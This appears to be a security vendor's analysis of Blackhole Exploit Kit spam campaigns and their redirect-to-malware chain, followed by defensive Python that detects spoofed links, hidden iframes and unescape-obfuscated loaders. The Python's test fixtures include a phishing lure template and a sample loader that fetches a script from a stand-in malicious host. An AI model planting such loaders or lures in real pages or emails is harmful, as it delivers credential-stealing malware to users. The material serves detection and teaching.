One of the prevalent exploit kits in cybercrime today is the Blackhole Exploit Kit (BHEK). The spam runs that push it use messages that look exactly like legitimate email notifications and leverage relevant and timely topics, all to lure users into clicking a URL that points to sites hosting the kit. Over the course of our monitoring and investigation we saw several changes in how cybercriminals use the Blackhole Exploit Kit and in the many lures it has used: bogus notifications from social networking websites, courier and bank notices, and cable email updates, among others. We noted several related spam campaigns that leveraged newsworthy items such as the birth of the royal baby and the movie Ender's Game. The campaigns also posed as bogus notifications from Facebook and eBay as a social engineering tactic.

Based on our investigation, spam related to the BHEK campaign reached up to 0.8% of the spammed messages collected in mid-2013. The top countries from which the spam run originated are the US, India, and Kazakhstan. These incidents show that attacks using exploit kits are an ongoing trend in today's threat landscape, and the Blackhole Exploit Kit in particular has become a cybercriminal favorite.

Blackhole Exploit Kits are hosted on specific malicious sites. The cybercriminals behind the attacks that spread the kit send out spammed messages containing links. The messages often use social engineering techniques to lure recipients into clicking, and they are typically disguised as spoofed notifications from well-known e-commerce and social networking sites. Users are then redirected to compromised sites and, finally, to sites hosting the Blackhole Exploit Kit.

What happens when users click the links in the spammed messages?

Users who are tricked into clicking the links are led to a compromised or abused website that contains malicious JavaScript. This script uses an embedded iframe that points to a dedicated malicious site running the Blackhole Exploit Kit. Once the iframe loads, another obfuscated script loads from the Blackhole Exploit Kit site. This code is responsible for searching for vulnerable software to exploit; the kit can target vulnerabilities in several products, including third-party applications such as Adobe Acrobat, Flash Player and Java, as well as Windows itself. Once a successful exploit has taken place, the Blackhole Exploit Kit initiates the malware installation. Based on our investigation, this type of attack spreads information-stealing malware like ZeuS/ZBOT and, more recently, TSPY_FAREIT variants.

What happens when user systems become infected with TSPY_FAREIT variants?

TSPY_FAREIT variants, specifically TSPY_FAREIT.AFM, which is used in the latest BHEK spam run, steal FTP client account information. They also collect stored email credentials and login details from browsers. Furthermore, TSPY_FAREIT.AFM uses a predetermined set of passwords to brute-force Windows logins. As such, users are at risk of having their personal information and the credentials for their bank and financial accounts stolen. This, in turn, may be used to launch other attacks, or the stolen information can be sold in the cybercrime underground.

The people behind these attacks use social engineering techniques to trick users into performing particular actions, such as clicking links that lead to the Blackhole Exploit Kit. One of their tactics is to leverage relevant and hot topics or news items and to use popular brand names. The attacks are also effective because the phishing emails are made to look exactly like authentic email notices from legitimate websites. Not only is this effective bait, it is also a technique for evading traditional email blocking methods. As Trend Micro product manager Sandra Cheng pointed out, "The format and wording of these emails were made to look legitimate. This is why these messages are difficult to detect using traditional methods."

This attack also capitalizes on exploiting software vulnerabilities. Note, however, that most of these exploits take advantage of old and known vulnerabilities. This just goes to show that reliable exploits have a long shelf life and attackers can still use them in future attacks; it also means that keeping Acrobat, Flash Player, Java and Windows patched removes most of what the kit relies on.

What are the different attacks related to the Blackhole exploits?

During the course of our investigation, we encountered several sample messages that spoofed email from different websites. Below are some of the recent noteworthy Blackhole exploit-related attacks.

Lure: poses as an official announcement from Scribd Live of the birth of Prince William and Kate Middleton's son. Payload: drops TROJ_MEDFOS.JET, which downloads malicious files.
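The chain described above (spoofed notification, compromised page, hidden iframe, obfuscated loader from the kit site) can be triaged with a few static checks on a captured sample. The following Python is an added example, not code from the original write-up or from Trend Micro: it flags links in a lure email whose real destination disagrees with the brand the message presents, finds hidden off-site iframes in the landing page, and decodes a document.write(unescape(...)) loader to recover the host it fetches from. The email and page samples, and every domain in them, are constructed placeholders; the sender/brand comparison uses a crude last-two-labels check that is an assumption for illustration, not a substitute for a public-suffix list.

```python
"""Triage helpers for the Blackhole spam chain described above: lure email,
compromised page, hidden iframe, obfuscated loader. Added example, not code
from the original write-up; samples are constructed, domains are placeholders."""
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Constructed lure: spoofed From: header and visible link text both claim the
# brand's domain, while the real href goes to a compromised third-party site.
SAMPLE_EMAIL = """\
From: Facebook <notification@facebook.com>

<html><body>
<a href="http://notice.example-compromised.net/fb/view.html">
  https://www.facebook.com/notifications</a>
<a href="https://www.facebook.com/help">Help Center</a>
</body></html>
"""

# Constructed landing page: hidden 1x1 iframe to a second host plus a
# document.write(unescape(...)) loader for that host, beside a benign embed.
SAMPLE_LANDING_PAGE = """\
<html><body>
<iframe src="http://kit.example-malicious.org/main.php?page=abc" width="1"
        height="1" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A//kit.example-malicious.org/x.js%22%3E%3C/script%3E'));</script>
<iframe src="/legit/embed.html" width="600" height="400"></iframe>
</body></html>
"""

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*["']?([^"'\s>]+)""")
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
ESCAPED_RE = re.compile(r"""unescape\(\s*['"]([^'"]+)['"]\s*\)""", re.I)
URL_RE = re.compile(r"https?://[\w./?=&%-]+")

class _Anchors(HTMLParser):
    """Collect (href, visible text) for every <a> element."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href") or "", []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

def _host(url):
    return (urlparse(url).hostname or "").lower()

def _same_site(a, b):  # crude registrable-domain check: last two DNS labels
    return a.split(".")[-2:] == b.split(".")[-2:]

def suspicious_links(raw_email):
    """hrefs whose destination disagrees with the brand the email presents."""
    m = re.search(r"^From:.*?@([\w.-]+)", raw_email, re.M)
    sender = m.group(1).lower() if m else ""
    parser = _Anchors()
    parser.feed(raw_email.split("\n\n", 1)[-1])  # body only
    flagged = []
    for href, text in parser.links:
        dest = _host(href)
        shown = _host(text) if text.startswith(("http://", "https://")) else ""
        # Link text shows one site but href goes elsewhere, or the link host
        # is outside the From: domain: both are what a spoofed notice produces.
        if (shown and not _same_site(dest, shown)) or (
                dest and sender and not _same_site(dest, sender)):
            flagged.append(href)
    return flagged

def hidden_offsite_iframes(page_html, page_host):
    """src of off-site iframes that are hidden or effectively zero-sized."""
    hits = []
    for tag in IFRAME_RE.findall(page_html):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag)}
        src = attrs.get("src", "")
        if not _host(src) or _same_site(_host(src), page_host):
            continue  # relative or same-site embed: ordinary page content
        style = attrs.get("style", "").lower().replace(" ", "")
        tiny = all(int(re.match(r"\d*", attrs.get(d, "")).group() or 100) <= 2
                   for d in ("width", "height"))
        if tiny or "visibility:hidden" in style or "display:none" in style:
            hits.append(src)
    return hits

def decode_obfuscated_scripts(page_html):
    """Hosts referenced by inline scripts that build markup via unescape()."""
    hosts = set()
    for body in SCRIPT_RE.findall(page_html):
        for encoded in ESCAPED_RE.findall(body):
            hosts.update(_host(u) for u in URL_RE.findall(unquote(encoded)))
    return sorted(hosts)

if __name__ == "__main__":
    print(hidden_offsite_iframes(SAMPLE_LANDING_PAGE, "www.example-compromised.net"))
```

Run against the constructed samples, the first link of the lure is flagged (its text claims the brand's site while the href goes to the compromised host), the 1x1 hidden iframe is reported while the same-site embed is not, and the decoded loader yields the kit host. The unescape() decoder covers only the simplest obfuscation style; real loaders often layer String.fromCharCode or custom decoders on top, which need a JavaScript engine rather than a regex.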